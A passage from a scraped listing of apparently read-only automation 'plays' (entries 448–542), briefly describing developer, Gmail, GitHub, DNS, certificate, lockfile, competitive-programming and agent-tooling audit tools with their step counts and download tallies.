syntax and common engineering risks.ROTE2 STEPSREAD ONLY2 ↓448Migration Blast RadiusRead-only migration blast-radius analysis. Given a repository, migration description, and target version, discovers Node/runtime manifests, maps API surface and dependency usage, identifies Rust equivalents where applicable, assesses config/build/test impact, and produces a risk-ranked ordered migration plan. Never modifies files. Supports nodejs-to-rust and generic dependency migrations.ROTE7 STEPSREAD ONLY2 ↓449Event Brief From Public UrlsTurn any hackathon or event link into a clear 1-page summary. Tells you the exact deadline, timezone, prizes, submission rules, setup commands, and official links. Catches and highlights when rules on different pages disagree with each other so you never miss a requirement. 100% read-only, zero setup, zero API keys, needs only python3.ROTE2 STEPSREAD ONLY2 ↓450Dataset Eval Sanity CheckCheck a JSONL dataset for duplicate rows, missing required keys, and text length outliers with exact row citations.ROTE1 STEPSREAD ONLY2 ↓451Training Health CheckRun a deterministic training health checker against plain-text and W&B offline logs and compare their verdicts.ROTE3 STEPSREAD ONLY2 ↓452Email Priority BriefSource-credited standalone extension of modiqo/[email protected]: preserves normalized Gmail emails, then classifies priority, extracts stated deadlines, suggests actions, and returns a concise briefing.APISESSIONSGMAIL3 STEPSREAD ONLY2 ↓453Hackathon Decision GateEvaluates whether a public hackathon is worth entering now, preserving cited requirements, UNKNOWNs, and authoritative conflicts.ROTE8 STEPSREAD ONLY2 ↓454ProbePostman in your CLI. Takes any URL or curl command, profiles latency (p50/p95/p99), auth/JWTs, and payload contracts, and generates an OpenAPI 3.1 spec ready for rote adapter create. Zero config, needs only python3 and curl.ROTE1 STEPSREAD ONLY2 ↓455Hackathon Readiness AuditorAudits a local project for hackathon submission readiness and returns a score, blockers, evidence, and prioritized fixes without exposing secret values.ROTE2 STEPSREAD ONLY2 ↓456Downloads FiledYour Downloads folder is where files go to be forgotten. This files the recent ones into a dated folder and leaves a manifest that puts every one of them back. Dry run by default - the first time you run it, it touches nothing and shows you the exact plan, so you can decide with the moves in front of you rather than after. It never overwrites - a name that already exists in the destination gets a numbered suffix, and the manifest records the rename. It never moves bundles or installers, because moving a .app or a .dmg breaks things in ways nobody connects back to a sweep they ran three days ago. Directories and dotfiles are left alone. After moving, it checks that every file is actually at its destination and actually gone from the source, and reports any that are not rather than claiming success. Two sweeps on the same day extend one manifest instead of replacing it, so the first sweep's files stay recoverable. Undo ships with the play as a script that refuses to overwrite anything sitting at the original path. No credentials, no network, python3 alone.ROTE5 STEPSREAD ONLY2 ↓457Mongoose Integrity ValidatorMongoose Integrity Checklist: scans backend/src models and services/controllers to report model coverage, indexed query health, and missing validation warnings. Read-only.ROTE3 STEPSREAD ONLY2 ↓458Agent Context PackerScans any local repo and instantly generates a complete Agent Context Brief — verified commands (test, build, lint, typecheck), stack fingerprint, architecture topology, sensitive path warnings, git state, env var preflight, and a ready-to-paste agent prompt. Run once at the start of every agent session. Zero network calls. Works on any language or framework. ROTE1 STEPSREAD ONLY2 ↓459Review Dependency Update PrReviews a public GitHub dependency update pull request and returns a conservative merge, review, or block recommendation with evidence, unknowns, and next checks.ROTE4 STEPSREAD ONLY2 ↓460Context Window GuardCheck prompts against LLM context windows, estimate tokens, flag safety marginROTE1 STEPSREAD ONLY2 ↓461Merge CanaryRun one identical non-interactive check on a topic ref alone and after a temporary merge with a selected base ref already present locally. No network fetch is performed. Canonical JSON is complete; the one-line summary is intentionally lossy.ROTE11 STEPSREAD ONLY2 ↓462Vibe DebtAudits what an AI coding session left behind in a repository: env vars read at runtime that no .env.example or README documents, packages imported but undeclared (and declared but unused), vendor credentials inlined in source, and files nothing imports. Read-only, no network, no credentials.ROTE4 STEPSREAD ONLY2 ↓463Agentic Generate ReviewGenerates code for a task using a local coding model (spark-coder, a Claude-Code-CLI-compatible wrapper pointed at a local model), then reviews the resulting git diff with an Anthropic model via the claude CLI. Returns the review text ending in a VERDICT: APPROVE or VERDICT: CHANGES NEEDED line. Requires spark-coder (or an equivalent local generator) to actually produce code; degrades to a labeled unknown if it is absent.ROTE2 STEPSREAD ONLY2 ↓464Github Pr Mergeability MonitorMonitors a GitHub pull request with gh, runs an unattended Codex CLI worker for new reviews and CI failures, and reports when the PR reaches a stable mergeable state.ROTE0 STEPSREAD ONLY2 ↓465Ai Visibility AuditScore any public URL's discoverability to AI assistants (0-100) with personalized fix recommendationsROTE1 STEPSREAD ONLY2 ↓466Inbox Action BriefCreates a read-only Gmail Inbox Action Brief from matching messages.APISESSIONSGMAIL4 STEPSREAD ONLY2 ↓467LinkcheckChecks a list of URLs and reports reachable, broken, redirected, and HTTP status results.ROTE1 STEPSREAD ONLY2 ↓468LogdigestCompresses noisy application logs into clustered error evidence for faster debugging.ROTE1 STEPSREAD ONLY2 ↓469PortcheckChecks whether a local TCP port is available for development.ROTE1 STEPSREAD ONLY2 ↓470Api HealthAPI endpoint health monitor. Parses endpoints from OpenAPI specs or route files, checks HTTP status codes, measures response times, and returns a deterministic verdict (HEALTHY / DEGRADED / UNHEALTHY) with prioritized recommendations. Read-only, no credentials. ROTE4 STEPSREAD ONLY2 ↓471EnvguardAudits repository environment configuration without modifying the repository. Detects environment variables used by application code, compares them with .env.example, and provides file/line evidence for undocumented variables. ROTE1 STEPSREAD ONLY2 ↓472Cross Cluster Service DiagnosisDiagnose why a service in one Kubernetes cluster can't reach a service in another cluster: checks DNS resolution, then Service/Pod-CIDR routing, and reports the exact broken layer with remediation optionsROTE15 STEPSREAD ONLY2 ↓473ShipquestTurn local Git evidence into a truthful, time-boxed quest board without changing the repository.ROTE5 STEPSREAD ONLY2 ↓474Explain Github IssueFetches a single GitHub issue by owner/repo/number and presents a structured digest for plain-English explanationAPISESSIONSGITHUB2 STEPSREAD ONLY2 ↓475Gmail Check Application RepliesCheck Gmail for replies to job/internship application emails sent within a configurable date rangeAPISESSIONSGMAIL-API3 STEPSREAD ONLY2 ↓476Ml Deployment ReadinessRead-only ML deployment-readiness assessment for a local project.ROTE4 STEPSREAD ONLY2 ↓477Hackathon Release ReadinessInspect a repository and report release blockers, safe test/demo results, and whether tests pass while the documented demo path is broken.ROTE4 STEPSREAD ONLY2 ↓478Systems Knowledge Gap MapAnalyze a resource or blog link, map it to systems knowledge gaps, and identify application contextsBROWSERSHELLSESSIONS3 STEPSREAD ONLY2 ↓479Pricing Page AssessmentIs my pricing page helping or hurting? Choose any reasoning CLI on your PATH as the harness; it snapshots the plan grid, persona, messaging, and CTAs from a pricing-page URL or a folder of pricing docs into a structured file, then applies Heavybit Crucible pricing guidance to produce a decision memo.APIBROWSERSESSIONSCRUCIBLE6 STEPSREAD ONLY2 ↓480Github Authored Issues In RangeLists open GitHub issues authored by a user within a created-date range, verified against GitHub's search total.APISESSIONSGITHUB6 STEPSREAD ONLY2 ↓481Research Paper Evidence AnalysisCreates a domain-neutral evidence packet and analysis request from a local source document. PDF support is limited to born-digital Flate-compressed text PDFs.ROTE1 STEPSREAD ONLY2 ↓482Github Pr Ci TriageSummarize non-success GitHub check runs for a pull request head SHA and poll after updatesSESSIONS0 STEPSREAD ONLY2 ↓483Trace DoctorROTE5 STEPSREAD ONLY1 ↓484Pr Release HorizonTraces a merged public GitHub pull request into the earliest positively verified non-draft published GitHub Release whose recursively resolved tag commit contains the PR merge commit. Reports direct release and compare links, latency, scan boundaries, listing consistency gaps, truncation, API limits, and uncertainty. Read-only and unauthenticated; never publishes, deploys, writes to GitHub, or claims visibility into every distribution channel.ROTE2 STEPSREAD ONLY1 ↓485Code Expiry RadarTurns temporary-code comments into a bounded expiry radar. Scans an inert bundled demo or regular UTF-8 blobs tracked by a local repository's HEAD, detects expired and future date contracts plus version-conditioned, issue-conditioned, malformed-date, and unbounded temporary markers, and adds bounded git-blame provenance when available. Reports direct file/line evidence, scan gaps, truncation, limits, and uncertainty. Read-only and offline; never executes repository code, invokes hooks or checkout filters, changes files, resolves remote issues, or claims runtime reachability.ROTE2 STEPSREAD ONLY1 ↓486Dont ForgetEvidence-only obligation brief joining read-only Gmail and Google CalendarAPISESSIONSCALENDARGMAIL6 STEPSREAD ONLY1 ↓487Rtl RedzoneFind RTL verification blind spots by injecting controlled faults and checking which ones survive existing tests.ROTE1 STEPSREAD ONLY1 ↓488Calendar Load AuditWhere your week actually went, from a calendar export you already have. Reads a local .ics file and reports the hours you spent in meetings, the longest uninterrupted block you were left with, the time you were only optional in, and the patterns that quietly wreck a week -- early calls, back-to-back runs, rooms of eight or more. No login, no upload, no tools to install: an .ics is plain text and every calendar app exports one. Repeating events are expanded only where the rule is unambiguous; anything else is listed as not counted, with the reason, rather than guessed at. Reads the file and never modifies it; writes one PDF report.ROTE5 STEPSREAD ONLY1 ↓489Cp Workspace GeneratorOne-click competitive programming starter that generates language-specific boilerplate, input, expected output, and testcase files for Codeforces and AtCoder.ROTE6 STEPSREAD ONLY1 ↓490Agent Context TaxTells you how much of the model's context window your installed agent tooling spends before you type anything. Every configured MCP server puts its tool schemas in front of the model at the start of every session, and every installed skill puts its name and description there so the model can decide whether to load it. None of that is visible and none of it is free: the bill arrives as a window that is already part full. Run on the machine that wrote this, it found 36,765 estimated tokens, 18.4 percent of a 200,000 token window, spent on 123 tool schemas and 90 skills before the first word of the task. It measures rather than infers: each stdio server is started, an initialize handshake is completed, tools/list is called, and the real reply is what gets counted, because a config block is not evidence a server answers or evidence of what it costs. Five stages run as a DAG: a declaration survey that answers even when a later handshake hangs, the server measurement, the skill and subagent survey, a cross-server ranking of the single most expensive tools, and a join that turns all of it into one number and an ordered list of what to disable first. It is careful about what it is not. Token counts are estimated from serialized bytes at a stated divisor and are named as an estimate everywhere they appear, never as a tokenizer's count. A remote server is reported as not measured rather than as free, because its schemas still reach the model and reaching it needs credentials this play does not carry. A server that will not start is reported separately from one that costs nothing, because a dead server is still declared and an agent still plans around it. Read-only with respect to your configuration: it starts child processes and kills them, and never edits a config file or a skill.ROTE5 STEPSREAD ONLY1 ↓491Mcp Reality CheckChecks MCP declarations found in a finite, reported set of Claude-compatible user and project config paths. Two independent roots survey those paths and probe declarations; their join compares stable identities and full-declaration fingerprints, refusing a clean verdict when a present config is unreadable, the probe limit truncates coverage, or declarations change between observations. Stdio declarations are launched and must return a structurally valid JSON-RPC initialize result. Missing binaries, invalid declarations, unresolved environment placeholders, bad working directories, launch failures, timeouts, bounded-output violations, protocol errors, and malformed replies remain separate findings. Child stdout and stderr are captured under a fixed memory limit and represented only by content-free byte counts; arbitrary child text is never returned. Remote transports are listed but never contacted. This is read-only with respect to configuration; it starts and terminates declared stdio child processes and never edits a config file.ROTE3 STEPSREAD ONLY1 ↓492Disk Pressure MapMaps disk pressure without turning a large directory into a deletion recommendation. Four independent surveys run concurrently: volume capacity, project artifacts backed by an ecosystem marker and regeneration command, exact tool-owned cache locations, and heavy paths left unclassified. Broad state containers such as ~/.cache, ~/Library/Caches, and ~/.docker are never called reclaimable. Canonical paths are de-duplicated across roots and categories, and every filesystem walk, cache measurement, and heavy-path survey has a reported time or item bound. Any truncation, unreadable requested root, or failed size measurement makes the verdict INCOMPLETE. Read-only: it measures and deletes nothing.ROTE5 STEPSREAD ONLY1 ↓493Skill Trigger CollisionsFinds active agent skills whose descriptions compete for the same prompt. It reads user skill directories, exact Claude plugin install paths that are both installed and enabled, and optional project skill directories; it deliberately ignores marketplace source trees and disabled plugins. Trigger tokens are Unicode and punctuation normalized, then weighted by inverse document frequency so common vocabulary does not dominate. Duplicate names are reported separately. An unreadable skill, missing description, unresolved plugin activation state, or bounded scan is evidence that the comparison is incomplete, never a clean result. Read-only: it reads local skill manifests and writes nothing.ROTE3 STEPSREAD ONLY1 ↓494Parallel Work Collision RadarBuilds an evidence-bounded integration queue before parallel branches or agent worktrees collide at merge time. Five independent read-only probes inventory local Git worktrees, compare every head with the selected integration base, map exact file overlap, identify schema/migration/lockfile coordination surfaces, and read an optional structured GitHub-plus-tracker export. A bounded dynamic fan-out then inspects each discovered worktree independently; the join rejects state drift between probes, constructs a collision graph, preserves declared blocker edges, detects dependency cycles, and emits a deterministic MERGE, REBASE, WAIT, or VERIFY order with concrete reasons. Caller-supplied provider data can prove a blocker but is never treated as live authorization to merge. It never fetches, checks out, rebases, merges, edits, or starts project code.ROTE7 STEPSREAD ONLY1 ↓495Hidden Prompt Injection ScanFetches raw static HTML (no JS execution) for one or more URLs and flags hidden/invisible prompt-injection payloads using fixed deterministic detectors and a fixed severity rule table, emitting a single Markdown report.ROTE1 STEPSREAD ONLY1 ↓496Google Form Draft FillFill a public Google Form as an unsubmitted draft: field inventory first, then text/dropdown/radio answers from parameters, verified via fresh snapshot. Never submits.BROWSER0 STEPSREAD ONLY1 ↓497Lineage Cycle Blast RadiusTreats a data lineage inventory as a directed graph and proves structural and operational hazards before a change. Parallel probes find cycles, missing endpoints and orphans, propagated freshness violations, and PII or changed-node blast radius; the synthesis join keeps unreachable and unknown evidence explicit. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓498Time Series Feature AvailabilityProves that every model feature was actually available at prediction time and that labels were observed only after the declared lag. Independent probes audit as-of cutoffs, source-event watermarks, label horizons, and join multiplicity or window leakage; a synthesis step joins their evidence without training a model or changing data. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓499Event Schema Evolution MatrixBuilds a four-way compatibility decision for serialized event changes in Protocol Buffers, Avro, or JSON Schema. Parallel probes validate both schema documents, prove backward and forward reads with concrete counterexample witnesses, and inspect wire or serialization hazards; synthesis labels the change backward, forward, full, or incompatible. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓500Ical Recurrence IntegrityValidates an iCalendar feed by unfolding content lines, resolving TZID semantics, boundedly expanding RRULE sets with RDATE and EXDATE, and reconciling RECURRENCE-ID overrides across DST boundaries. Four probes run independently and a synthesis join refuses to treat unsupported or unbounded recurrence evidence as clean. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓501Localization Bundle ContractChecks a localization bundle as a cross-locale interface rather than a bag of strings. Four independent probes compare keys, placeholders and plural branches, markup structure, and Unicode normalization or expansion budgets; synthesis distinguishes definite breakage from locale-specific uncertainty. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓502Geojson Topology ProofStatically proves key GeoJSON geometry invariants before spatial ingestion. Parallel probes validate coordinate domains, ring closure and winding, segment self-intersections, and hole containment plus antimeridian and bbox consistency; the synthesis join reports precise feature and coordinate witnesses. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓503Webhook Replay BoundaryAnalyzes captured webhook delivery scenarios as a security and correctness boundary. Use it before every handler or provider-integration release and after duplicate-effect or signature incidents. Four sibling probes verify that signatures bind the exact raw body, enforce signature and timestamp freshness, require explicit idempotency keys to be non-empty, stable across redeliveries, and unique across event IDs while covering provider retry horizons, and prove verification/claim/side-effect/ack ordering; a synthesis join exposes replay paths that isolated signature checks miss and orders fixes by severity. It reads JSON only, sends no webhook, executes no handler, writes no idempotency record, and makes no network calls. Run with input=evidence/webhook-scenarios.json or omit input for the bundled demo. Limits: HMAC-SHA256 is the portable modeled scheme, secrets in input should be synthetic or safely exported test material, database isolation and crash behavior are assessed only from declared scenario facts, and live provider behavior is not queried.ROTE5 STEPSREAD ONLY1 ↓504Retry Amplification BudgetModels retry amplification across client, gateway, service, and dependency layers. Use it during overload/timeout incidents and before every retry, timeout, hedge, or pool configuration review. Four sibling probes calculate the multiplicative attempt tree, a timeout/backoff latency envelope, offered concurrency against per-layer pools, and policy hazards such as overlapping retry domains, missing jitter, hedging, and non-idempotent retries; a synthesis join compares all of them with explicit end-to-end budgets and prioritizes the control changes. It reads JSON only, generates no traffic, sleeps never, and changes no configuration. Run with input=evidence/retry-stack.json or omit input for the bundled demo. Limits: the model is a conservative envelope rather than a queueing simulation, correlation and adaptive breakers require supplied parameters, and real latency distributions are not inferred.ROTE5 STEPSREAD ONLY1 ↓505Dns Zone IntegrityAnalyzes a normalized DNS zone snapshot as interacting RRsets and graph boundaries. Use it before every zone deployment and during DNS incident triage. Nonblank record owners/types/values, supported SOA/NS/MX/SRV/name-bearing RDATA shapes, and a finite ordered TTL policy are validated before RRsets can satisfy coverage; name-bearing RDATA is then resolved against the zone before semantic duplicate or conflict checks, so relative and equivalent absolute targets compare identically while non-name payload case remains intact. Four sibling probes detect CNAME/apex/SOA/RRset conflicts (including multi-target CNAME owners), dangling or cyclic in-zone targets with linear bounded-witness traversal and MX/SRV/NS targets that illegally alias through CNAME, broken delegation/glue/DS boundaries, and TTL incoherence across RRsets and alias chains; a synthesis join produces one integrity verdict with severity-prioritized repairs. It reads JSON only, performs no DNS queries or zone changes, and writes nothing. Run with input=zones/example.json or omit input for the bundled demo. Limits: DNSSEC cryptography, live parent/recursive behavior, dynamic updates, split-horizon views, and record types not described in the input remain outside the model.ROTE5 STEPSREAD ONLY1 ↓506Certificate Rotation GapPreflights a certificate fleet and rotation plan before rollout. Use it at every scheduled rotation review, before binding rollout, and during certificate-related incident triage. Four independent probes evaluate validity windows for current, next, and explicitly declared candidate certificates, reject empty or malformed certificate/binding/client chain evidence, validate a non-negative integer expiry-warning horizon and finite positive overlap policy, compare hostname/IP SAN identities, require every declared next certificate and unattached candidate to map to a complete rotation-plan endpoint regardless of the current warning horizon, model client-specific chain trust, and require both old and next certificates to remain valid strictly past rollout finish; unused historical inventory is reported separately and cannot create a false rotation gap. The synthesis join identifies endpoints that can become invalid even when each certificate looks acceptable alone and prioritizes the repair order. It reads a JSON snapshot only, never opens sockets, changes bindings, reads key material, or contacts a CA. Run with input=evidence/cert-rotation.json or omit input for the bundled demo. Limits: OCSP/CRL, live TLS negotiation, private-key possession, client clock skew, and undocumented trust stores are outside the supplied model.ROTE5 STEPSREAD ONLY1 ↓507Lockfile Trust ChainAudits a normalized manifest-plus-lockfile snapshot as a trust chain. Use it on every dependency PR or lockfile regeneration and again before a release cut. It rejects blank package names, versions, explicit node IDs, root resolved IDs, dependency references, and any supplied non-string or blank source coordinate before analysis. Four parallel probes then find mutable registry/path/URL/Git sources—including case-insensitive git+, git://, ssh://, and SCP-style Git coordinates unless pinned to a full commit—missing, weak, malformed, or truncated integrity evidence using algorithm-specific decoded digest lengths, roots whose transitive closure is absent or padded with unreachable entries using iterative traversal with bounded cycle witnesses, and version/source conflicts against manifest intent including npm-compatible caret-zero bounds; a synthesis join reports whether the lock can anchor a repeatable install and orders repairs by severity. It reads JSON only and performs no install, fetch, write, or registry call. Run with input=evidence/lock.json or omit input for the bundled demo. Limits: package-manager-specific peer/optional/platform resolution must be normalized by the caller, signatures are evaluated only when represented, and integrity values are structurally checked rather than recomputed from package bytes.ROTE5 STEPSREAD ONLY1 ↓508Effective Permission Toxic ChainComputes effective permissions from a portable authorization snapshot instead of reviewing grants one row at a time. Use it for recurring access reviews and after every role, group, inheritance, or policy change. Four independent probes expand transitive group membership, evaluate inherited allow/deny and wildcard rules, detect toxic permission pairs, and construct principal-to-action witness paths; wildcard actions expand from concrete catalog, toxic-pair, privileged, and matched-rule actions, while an unexpandable wildcard is INDETERMINATE and never silently CLEAR. A synthesis join returns severity-prioritized remediation and refuses a clean result if any required dimension is absent. Duplicate principal/group/resource IDs, unknown parent references, and cyclic resource hierarchies fail closed before any grant is evaluated, so malformed topology cannot produce CLEAR. It reads JSON only, writes nothing, and calls no provider. Run with input=snapshots/access.json or omit input for the bundled demo. Limits: the evaluator implements the declared allow/deny model rather than a vendor-specific IAM engine, conditions must already be resolved into the snapshot, and runtime service-control constraints are not inferred.ROTE5 STEPSREAD ONLY1 ↓509Artifact Reproducibility ExplainerExplains why two builds are not reproducible. Use it after every reproducibility-CI mismatch and before promoting a release artifact. Four sibling probes compare nonblank/control-free artifact member paths and payloads, metadata-only drift, canonical nested source-object/command/environment-object evidence with collision-free typed key/index paths, and ordered stage digests; all file and stage digests must be complete 64-hex SHA-256 values, and differing declared inputs are redacted into fingerprints so tokens or credentials are never echoed. Optional raw archive order is validated as a complete unique member list when supplied, while stage metadata digests remain the authoritative packaging evidence. A join reports the earliest evidenced divergence and a severity-prioritized next action while distinguishing content from packaging metadata. REPRODUCIBLE is reserved for equivalent declared inputs plus complete comparable stage evidence; equal outputs under different inputs are INPUTS_DIFFER, and missing evidence is INDETERMINATE. It reads a two-build JSON evidence bundle, never executes a build, writes nothing, and makes no network calls. Run with input=evidence/two-builds.json, or omit input for the bundled demo. Limits: causal language is bounded to supplied stages and inputs, missing provenance remains explicit, and semantic equivalence of different binaries is outside scope.ROTE5 STEPSREAD ONLY1 ↓510Archive Extraction AmbiguityPreflights an archive manifest before extraction by modeling the destination as a virtual namespace. Use it for every uploaded or third-party release archive before extraction, and again when extraction policy changes. Four independent probes detect traversal and platform aliases, order-sensitive symlink or hardlink write-through, case/Unicode/file-directory collisions, and entry-count/size/ratio expansion hazards; symlink targets are parent-relative while hardlink targets use an explicit coordinate mode that defaults to archive-root-relative. A synthesis step joins them into one severity-prioritized extraction decision. It reads a JSON manifest and never extracts, writes, follows links, or accesses the network. Run with input=path/to/manifest.json, or omit input to use the bundled adversarial demo. Limits: findings depend on the supplied manifest and policy, nested archive contents are not recursively inspected, and filesystem-specific canonicalization is approximated conservatively.ROTE5 STEPSREAD ONLY1 ↓511Ai News Benchmarks BriefingWeekly AI briefing: latest AI news from HN, TechCrunch and Ars Technica, plus a 6-benchmark comparison (MMLU-Pro, GPQA Diamond, HLE, SWE-bench, Arena Elo, OSWorld) merged with the live model catalog. Public data only, no credentials, chat Markdown output.ROTE3 STEPSREAD ONLY1 ↓512Find Outdated SkillsFind broken or outdated commands in your AI agent's instructions. Checks instructions in your README, SKILL.md, or AGENTS.md against the actual tools installed on your computer and shows you what needs fixing. Zero setup, zero keys, 100% safe.ROTE1 STEPSREAD ONLY1 ↓513Find Repeated PromptsFind the questions and instructions you type to your AI agent over and over again. Automatically groups your repeated prompts so you can turn them into fast, reusable 1-click tools. Zero setup, zero API keys, runs completely locally.ROTE1 STEPSREAD ONLY1 ↓514Security ScanAudits a Python project directory for security issues (AST checks + optional bandit + pip-audit) and writes SECURITY-REPORT.md (plus security-report.json). Read-only.ROTE2 STEPSREAD ONLY1 ↓515Brute Force To OptimalMap repeated work in a slow solution to observations, an optimization direction, and a complexity comparison. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓516Which Dsa Pattern Is ThisRank likely data-structure and algorithm patterns with evidence for and against each candidate. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓517Dp State DesignerDerive dynamic-programming state, transitions, base cases, order, answer, and unresolved assumptions. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓518Recursion VisualizerProduce a bounded human-readable recursion call tree with parameters, returns, base cases, repeated work, and memoization opportunities. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓519Tle RescueEstimate solution complexity, locate repeated expensive work, compare with constraints, and suggest safe optimization directions. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓520Wrong Answer DetectiveRank likely causes of a wrong answer from the problem, implementation, and supplied cases without pretending to execute code. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓521Binary Search Boundary DoctorCheck binary-search meanings, invariants, termination, and boundary cases for low/high/mid mistakes. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓522Graph Problem TranslatorTranslate a story problem into nodes, edges, direction, weights, state, objective, and candidate graph-tool families. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓523Constraint WhispererTurn numeric constraints into complexity implications and narrow plausible solution strategies. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓524Sample Test Lie DetectorExplain what samples cover, what they omit, and which missing test categories could expose a false sense of correctness. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓525Dry Run My CodeCreate a compact bounded execution table for important variables and identify the first incorrect state. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓526Edge Case Torture ChamberGenerate adversarial edge-case categories for a problem and proposed solution, explaining which assumption each attacks. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE12 STEPSREAD ONLY1 ↓527Git History Secret AuditorScan git commit history for hardcoded credentials, deleted .env secrets, private keys, connection strings, and high-entropy tokens, with every finding redacted to a prefix/suffix fingerprint.ROTE1 STEPSREAD ONLY1 ↓528Privacy Deletion Path ProofBuilds an evidence-bearing proof that personal data can be deleted along every declared flow from collection through processors, logs, exports, and backups. Four probes inventory collection paths, trace erasure propagation, inspect residual surfaces, and validate evidence freshness; missing evidence becomes UNKNOWN rather than clean. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓529Off By One ExorcistCompare indexing and interval boundaries against the mathematical range and identify likely off-by-one failures. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓530My Approach Vs EditorialMap differences between a proposed solution idea and a reference approach, including insight and complexity gaps. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓531Memory Limit RescueInspect a solution for oversized state, copies, recursion depth, and storage risks, then suggest bounded reductions. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓532Leetcode Stuck RescueFind the reasoning bottleneck in a coding-problem attempt and provide progressive hints without dumping a solution. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓533I Understand The Solution But Cant Code ItConvert an algorithm idea into data structures, invariants, responsibilities, pseudocode checkpoints, and implementation risks. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓534I Can Code It But Cant Explain ItPrepare an interview-ready explanation with intuition, correctness, complexity, edge cases, and follow-up questions. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY1 ↓535Ranking Slice ParadoxAudits two ranking models for an aggregate-versus-slice paradox. Four independent probes compute O(N log N) rank-based AUC with an O(replicates * N) deterministic weighted bootstrap, group slices, calibration and top-K composition, and Simpson reversal witnesses; a synthesis join reports when an aggregate win hides consistent slice losses. Omit input to use the bundled adversarial demo, or pass input=path for fresh evidence. It is read-only, deterministic, network-free, and Python-standard-library-only.ROTE5 STEPSREAD ONLY1 ↓536Tokens SavedShows real, measured token numbers -- never a fabricated "tokens saved" figure. Two hard facts: (1) prompt-cache savings across every real Claude Code session on this machine -- cache_read_input_tokens is tokens that were served from cache instead of freshly reprocessed, a directly measured number, no guessing; (2) the real token cost of what every rote play-run workspace's own steps processed internally (from rote's own archive, read via the duckdb Python package against the parquet files directly -- no DuckDB CLI required), broken down per play with call/run counts so it is never mistaken for a single-run cost. On top of those two measured facts it shows a live compression example: how many raw tokens THIS play's own steps just processed, versus how few tokens its own final human-readable report actually costs to read -- a genuine, reproducible, measured ratio computed fresh every run, not a historical claim. An AI narrates what the numbers mean in plain words, but is explicitly told never to invent or estimate a number that is not already measured. If no archived play-run data exists yet, it says so plainly and tells you to run `rote archive --all` first, rather than making anything up.ROTE4 STEPSREAD ONLY1 ↓537Play AdvisorFor anyone confused about what to build for the Rote Playoffs hackathon. Pulls real, live data from the play.modiqo.ai registry -- a sample of published plays, their real download counts, and a real breakdown of what kind of plays exist (browser automation vs API/adapter-based vs plain script) -- then asks an AI assistant to explain, in the simplest plain words, what the most-downloaded plays actually do for a person, what part of the registry is crowded vs thin, and one small concrete idea you could build in the thin area. Includes real quotes from the hackathon's own kickoff livestream on how to think about this (mine your own repeated chat sessions for ideas; quality over quantity). All numbers in the output are counted directly from what the registry returned that run -- the assistant is told explicitly never to invent or restate different numbers. Pass topic=<your interest> to steer the idea toward something you actually care about; leave it blank for a general idea. Read-only: only ever queries the public registry, writes nothing, needs no credentials.ROTE3 STEPSREAD ONLY1 ↓538Eval Contamination DetectorDetect train/eval benchmark contamination and verbatim/near-duplicate leakage with 4-stage DAG verification and balanced candidate arithmetic.ROTE3 STEPSREAD ONLY1 ↓539Webmcp Site Agent ReadinessA deep post-discovery PR and release gate for WebMCP sites. It accepts either a complete offline observation with declared high-value journeys or a saved, read-only document.modelContext.getTools capture produced by any Playwright-compatible browser adapter. Offline mode runs five independent probes across the 2026-09-03 draft contract, bounded structural JSON Schema checks, intent coverage and overlap, safety/confirmation/origin boundaries, dynamic registration, abort behavior, UI synchronization, graceful errors, and fallbacks. Saved-capture mode inventories the live declarations without invoking a tool and marks every unobserved behavior UNKNOWN. Malformed origins, schemas, coverage declarations, annotations, exposure policies, registrations, runtime observations, or capture files fail closed.ROTE8 STEPSREAD ONLY1 ↓540Database Change TranslatorTranslate local schema or migration evidence into compatibility and verification considerations. Read-only: no project code execution, writes, network calls, or secret values.ROTE10 STEPSREAD ONLY1 ↓541Deploy LineageRead-only cross-system evidence reconciliation from an exact GitHub commit and successful Actions run through a GHCR image digest to the traffic-bearing Azure Container Apps revision.ROTE0 STEPSREAD ONLY1 ↓542Review LoadMeasures how much you asked a reviewer to hold in their head at once, commit by commit. On the repository this was built on, 52 percent of commits exceeded 400 changed lines and those commits carried 93 percent of 